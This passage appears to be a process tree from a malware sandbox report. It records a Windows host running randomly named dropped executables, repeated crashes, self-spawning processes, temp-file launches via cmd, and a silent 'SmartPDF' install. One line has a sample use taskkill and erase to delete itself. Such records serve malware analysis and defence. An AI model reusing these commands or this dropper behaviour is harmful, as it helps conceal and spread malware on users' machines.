                                                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1844,1846686445768890138,6717164434258036522,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1864 /prefetch:2
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                  PID:6236
                                                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1844,1846686445768890138,6717164434258036522,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1936 /prefetch:8
                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                    PID:6708
                                                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1844,1846686445768890138,6717164434258036522,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1920 /prefetch:8
                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                      PID:9520
                                                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1844,1846686445768890138,6717164434258036522,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2180 /prefetch:1
                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                        PID:10320
                                                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1844,1846686445768890138,6717164434258036522,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2096 /prefetch:1
                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                          PID:10272
                                                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --field-trial-handle=1844,1846686445768890138,6717164434258036522,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=2 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3188 /prefetch:1
                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                            PID:10476
                                                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --field-trial-handle=1844,1846686445768890138,6717164434258036522,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3448 /prefetch:1
                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                              PID:10616
                                                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --field-trial-handle=1844,1846686445768890138,6717164434258036522,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3500 /prefetch:1
                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                PID:10668
                                                                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --field-trial-handle=1844,1846686445768890138,6717164434258036522,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3672 /prefetch:1
                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                  PID:10712
                                                                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1844,1846686445768890138,6717164434258036522,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4644 /prefetch:8
                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                    PID:10812
                                                                                                                                                                                                              • C:\Users\Admin\Documents\2S8HDwuvjFusrqfHxWCRJljv.exe
                                                                                                                                                                                                                "C:\Users\Admin\Documents\2S8HDwuvjFusrqfHxWCRJljv.exe"
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                PID:1040
                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1040 -s 668
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                  • Program crash
                                                                                                                                                                                                                  PID:5496
                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1040 -s 676
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                  • Program crash
                                                                                                                                                                                                                  PID:6012
                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1040 -s 680
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                  • Program crash
                                                                                                                                                                                                                  PID:4840
                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1040 -s 664
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                  • Program crash
                                                                                                                                                                                                                  PID:5232
                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1040 -s 1128
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                  • Program crash
                                                                                                                                                                                                                  PID:6316
                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1040 -s 1132
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                  • Program crash
                                                                                                                                                                                                                  PID:6608
                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1040 -s 1120
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                  • Program crash
                                                                                                                                                                                                                  PID:7128
                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1040 -s 1196
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                  • Program crash
                                                                                                                                                                                                                  PID:6272
                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1040 -s 1060
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                  • Program crash
                                                                                                                                                                                                                  PID:4076
                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1040 -s 1108
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                  • Program crash
                                                                                                                                                                                                                  PID:7060
                                                                                                                                                                                                              • C:\Users\Admin\Documents\Lay1sxI0kpZjk6C58lyjJ8zy.exe
                                                                                                                                                                                                                "C:\Users\Admin\Documents\Lay1sxI0kpZjk6C58lyjJ8zy.exe"
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                  PID:852
                                                                                                                                                                                                                  • C:\Users\Admin\Documents\Lay1sxI0kpZjk6C58lyjJ8zy.exe
                                                                                                                                                                                                                    "C:\Users\Admin\Documents\Lay1sxI0kpZjk6C58lyjJ8zy.exe" -u
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                      PID:5688
                                                                                                                                                                                                                  • C:\Users\Admin\Documents\ZChQlEY8CnQp5DZbAlw2digv.exe
                                                                                                                                                                                                                    "C:\Users\Admin\Documents\ZChQlEY8CnQp5DZbAlw2digv.exe"
                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                    PID:4492
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 736
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                                      PID:5604
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 752
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                                      PID:5144
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 756
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                                      PID:1848
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 768
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                                      PID:5828
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 1212
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                                      PID:6808
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 1292
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                                      PID:6632
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 1372
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                                      PID:6496
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 1344
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                                      PID:5856
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 1292
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                                      PID:7272
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 1392
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                                      PID:8036
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 1292
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                                      PID:8008
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 1388
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                                      PID:7952
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 1352
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                                      PID:7372
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 1416
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                                      PID:5860
                                                                                                                                                                                                                  • C:\Users\Admin\Documents\C0pvmiQUkXiKBJoQTi5xri3_.exe
                                                                                                                                                                                                                    "C:\Users\Admin\Documents\C0pvmiQUkXiKBJoQTi5xri3_.exe"
                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                    PID:196
                                                                                                                                                                                                                    • C:\Users\Admin\Documents\C0pvmiQUkXiKBJoQTi5xri3_.exe
                                                                                                                                                                                                                      C:\Users\Admin\Documents\C0pvmiQUkXiKBJoQTi5xri3_.exe
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                        PID:4580
                                                                                                                                                                                                                      • C:\Users\Admin\Documents\C0pvmiQUkXiKBJoQTi5xri3_.exe
                                                                                                                                                                                                                        C:\Users\Admin\Documents\C0pvmiQUkXiKBJoQTi5xri3_.exe
                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                          PID:5836
                                                                                                                                                                                                                        • C:\Users\Admin\Documents\C0pvmiQUkXiKBJoQTi5xri3_.exe
                                                                                                                                                                                                                          C:\Users\Admin\Documents\C0pvmiQUkXiKBJoQTi5xri3_.exe
                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                            PID:1976
                                                                                                                                                                                                                          • C:\Users\Admin\Documents\C0pvmiQUkXiKBJoQTi5xri3_.exe
                                                                                                                                                                                                                            C:\Users\Admin\Documents\C0pvmiQUkXiKBJoQTi5xri3_.exe
                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                              PID:5212
                                                                                                                                                                                                                            • C:\Users\Admin\Documents\C0pvmiQUkXiKBJoQTi5xri3_.exe
                                                                                                                                                                                                                              C:\Users\Admin\Documents\C0pvmiQUkXiKBJoQTi5xri3_.exe
                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                PID:5780
                                                                                                                                                                                                                              • C:\Users\Admin\Documents\C0pvmiQUkXiKBJoQTi5xri3_.exe
                                                                                                                                                                                                                                C:\Users\Admin\Documents\C0pvmiQUkXiKBJoQTi5xri3_.exe
                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                  PID:5788
                                                                                                                                                                                                                                • C:\Users\Admin\Documents\C0pvmiQUkXiKBJoQTi5xri3_.exe
                                                                                                                                                                                                                                  C:\Users\Admin\Documents\C0pvmiQUkXiKBJoQTi5xri3_.exe
                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                    PID:492
                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\C0pvmiQUkXiKBJoQTi5xri3_.exe
                                                                                                                                                                                                                                    C:\Users\Admin\Documents\C0pvmiQUkXiKBJoQTi5xri3_.exe
                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                      PID:6436
                                                                                                                                                                                                                                    • C:\Users\Admin\Documents\C0pvmiQUkXiKBJoQTi5xri3_.exe
                                                                                                                                                                                                                                      C:\Users\Admin\Documents\C0pvmiQUkXiKBJoQTi5xri3_.exe
                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                        PID:6972
                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\C0pvmiQUkXiKBJoQTi5xri3_.exe
                                                                                                                                                                                                                                        C:\Users\Admin\Documents\C0pvmiQUkXiKBJoQTi5xri3_.exe
                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                          PID:6396
                                                                                                                                                                                                                                        • C:\Users\Admin\Documents\C0pvmiQUkXiKBJoQTi5xri3_.exe
                                                                                                                                                                                                                                          C:\Users\Admin\Documents\C0pvmiQUkXiKBJoQTi5xri3_.exe
                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                            PID:1036
                                                                                                                                                                                                                                          • C:\Users\Admin\Documents\C0pvmiQUkXiKBJoQTi5xri3_.exe
                                                                                                                                                                                                                                            C:\Users\Admin\Documents\C0pvmiQUkXiKBJoQTi5xri3_.exe
                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                              PID:7036
                                                                                                                                                                                                                                            • C:\Users\Admin\Documents\C0pvmiQUkXiKBJoQTi5xri3_.exe
                                                                                                                                                                                                                                              C:\Users\Admin\Documents\C0pvmiQUkXiKBJoQTi5xri3_.exe
                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                PID:6992
                                                                                                                                                                                                                                              • C:\Users\Admin\Documents\C0pvmiQUkXiKBJoQTi5xri3_.exe
                                                                                                                                                                                                                                                C:\Users\Admin\Documents\C0pvmiQUkXiKBJoQTi5xri3_.exe
                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                  PID:6196
                                                                                                                                                                                                                                                • C:\Users\Admin\Documents\C0pvmiQUkXiKBJoQTi5xri3_.exe
                                                                                                                                                                                                                                                  C:\Users\Admin\Documents\C0pvmiQUkXiKBJoQTi5xri3_.exe
                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                    PID:7332
                                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\C0pvmiQUkXiKBJoQTi5xri3_.exe
                                                                                                                                                                                                                                                    C:\Users\Admin\Documents\C0pvmiQUkXiKBJoQTi5xri3_.exe
                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                      PID:7812
                                                                                                                                                                                                                                                    • C:\Users\Admin\Documents\C0pvmiQUkXiKBJoQTi5xri3_.exe
                                                                                                                                                                                                                                                      C:\Users\Admin\Documents\C0pvmiQUkXiKBJoQTi5xri3_.exe
                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                        PID:6748
                                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\C0pvmiQUkXiKBJoQTi5xri3_.exe
                                                                                                                                                                                                                                                        C:\Users\Admin\Documents\C0pvmiQUkXiKBJoQTi5xri3_.exe
                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                          PID:7768
                                                                                                                                                                                                                                                        • C:\Users\Admin\Documents\C0pvmiQUkXiKBJoQTi5xri3_.exe
                                                                                                                                                                                                                                                          C:\Users\Admin\Documents\C0pvmiQUkXiKBJoQTi5xri3_.exe
                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                            PID:4800
                                                                                                                                                                                                                                                          • C:\Users\Admin\Documents\C0pvmiQUkXiKBJoQTi5xri3_.exe
                                                                                                                                                                                                                                                            C:\Users\Admin\Documents\C0pvmiQUkXiKBJoQTi5xri3_.exe
                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                              PID:4876
                                                                                                                                                                                                                                                            • C:\Users\Admin\Documents\C0pvmiQUkXiKBJoQTi5xri3_.exe
                                                                                                                                                                                                                                                              C:\Users\Admin\Documents\C0pvmiQUkXiKBJoQTi5xri3_.exe
                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                PID:7384
                                                                                                                                                                                                                                                              • C:\Users\Admin\Documents\C0pvmiQUkXiKBJoQTi5xri3_.exe
                                                                                                                                                                                                                                                                C:\Users\Admin\Documents\C0pvmiQUkXiKBJoQTi5xri3_.exe
                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                  PID:8480
                                                                                                                                                                                                                                                                • C:\Users\Admin\Documents\C0pvmiQUkXiKBJoQTi5xri3_.exe
                                                                                                                                                                                                                                                                  C:\Users\Admin\Documents\C0pvmiQUkXiKBJoQTi5xri3_.exe
                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                    PID:9024
                                                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\C0pvmiQUkXiKBJoQTi5xri3_.exe
                                                                                                                                                                                                                                                                    C:\Users\Admin\Documents\C0pvmiQUkXiKBJoQTi5xri3_.exe
                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                      PID:8772
                                                                                                                                                                                                                                                                    • C:\Users\Admin\Documents\C0pvmiQUkXiKBJoQTi5xri3_.exe
                                                                                                                                                                                                                                                                      C:\Users\Admin\Documents\C0pvmiQUkXiKBJoQTi5xri3_.exe
                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                        PID:8924
                                                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\C0pvmiQUkXiKBJoQTi5xri3_.exe
                                                                                                                                                                                                                                                                        C:\Users\Admin\Documents\C0pvmiQUkXiKBJoQTi5xri3_.exe
                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                          PID:8444
                                                                                                                                                                                                                                                                        • C:\Users\Admin\Documents\C0pvmiQUkXiKBJoQTi5xri3_.exe
                                                                                                                                                                                                                                                                          C:\Users\Admin\Documents\C0pvmiQUkXiKBJoQTi5xri3_.exe
                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                            PID:9544
                                                                                                                                                                                                                                                                          • C:\Users\Admin\Documents\C0pvmiQUkXiKBJoQTi5xri3_.exe
                                                                                                                                                                                                                                                                            C:\Users\Admin\Documents\C0pvmiQUkXiKBJoQTi5xri3_.exe
                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                              PID:8592
                                                                                                                                                                                                                                                                            • C:\Users\Admin\Documents\C0pvmiQUkXiKBJoQTi5xri3_.exe
                                                                                                                                                                                                                                                                              C:\Users\Admin\Documents\C0pvmiQUkXiKBJoQTi5xri3_.exe
                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                PID:10036
                                                                                                                                                                                                                                                                              • C:\Users\Admin\Documents\C0pvmiQUkXiKBJoQTi5xri3_.exe
                                                                                                                                                                                                                                                                                C:\Users\Admin\Documents\C0pvmiQUkXiKBJoQTi5xri3_.exe
                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                  PID:9980
                                                                                                                                                                                                                                                                                • C:\Users\Admin\Documents\C0pvmiQUkXiKBJoQTi5xri3_.exe
                                                                                                                                                                                                                                                                                  C:\Users\Admin\Documents\C0pvmiQUkXiKBJoQTi5xri3_.exe
                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                    PID:10016
                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\C0pvmiQUkXiKBJoQTi5xri3_.exe
                                                                                                                                                                                                                                                                                    C:\Users\Admin\Documents\C0pvmiQUkXiKBJoQTi5xri3_.exe
                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                      PID:10536
                                                                                                                                                                                                                                                                                    • C:\Users\Admin\Documents\C0pvmiQUkXiKBJoQTi5xri3_.exe
                                                                                                                                                                                                                                                                                      C:\Users\Admin\Documents\C0pvmiQUkXiKBJoQTi5xri3_.exe
                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                        PID:10984
                                                                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\C0pvmiQUkXiKBJoQTi5xri3_.exe
                                                                                                                                                                                                                                                                                        C:\Users\Admin\Documents\C0pvmiQUkXiKBJoQTi5xri3_.exe
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                          PID:11128
                                                                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\qzVA2JMgkK95oPzyPBfSlyXR.exe
                                                                                                                                                                                                                                                                                        "C:\Users\Admin\Documents\qzVA2JMgkK95oPzyPBfSlyXR.exe"
                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                                        PID:3552
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\0202012383.exe"
                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                            PID:5484
                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\0202012383.exe
                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\0202012383.exe"
                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                PID:5564
                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\0078376591.exe"
                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                PID:7272
                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\0078376591.exe
                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\0078376591.exe"
                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                    PID:8104
                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c taskkill /im "qzVA2JMgkK95oPzyPBfSlyXR.exe" /f & erase "C:\Users\Admin\Documents\qzVA2JMgkK95oPzyPBfSlyXR.exe" & exit
                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                    PID:5720
                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                      taskkill /im "qzVA2JMgkK95oPzyPBfSlyXR.exe" /f
                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                                                                                                                                                                      PID:4404
                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Documents\OBqtbPrG6UeWpNoJWMMBiUx3.exe
                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Documents\OBqtbPrG6UeWpNoJWMMBiUx3.exe"
                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                    PID:4904
                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\3062668.exe
                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\3062668.exe"
                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                        PID:4504
                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                            PID:6568
                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\7886880.exe
                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\7886880.exe"
                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                            PID:3756
                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\6735160.exe
                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\6735160.exe"
                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                              PID:6048
                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\3149615.exe
                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\3149615.exe"
                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                PID:684
                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Documents\1lMYefYHlFE4OtY7dJQESXLj.exe
                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\Documents\1lMYefYHlFE4OtY7dJQESXLj.exe"
                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                PID:1820
                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-1BAM0.tmp\1lMYefYHlFE4OtY7dJQESXLj.tmp
                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-1BAM0.tmp\1lMYefYHlFE4OtY7dJQESXLj.tmp" /SL5="$20290,138429,56832,C:\Users\Admin\Documents\1lMYefYHlFE4OtY7dJQESXLj.exe"
                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                    PID:4340
                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-T2ULN.tmp\Setup.exe
                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-T2ULN.tmp\Setup.exe" /Verysilent
                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                        PID:6472
                                                                                                                                                                                                                                                                                                                        • C:\Program Files (x86)\SmartPDF\SmartPDF\9840432e051a6fa1192594db02b80a4c1fd73456.exe
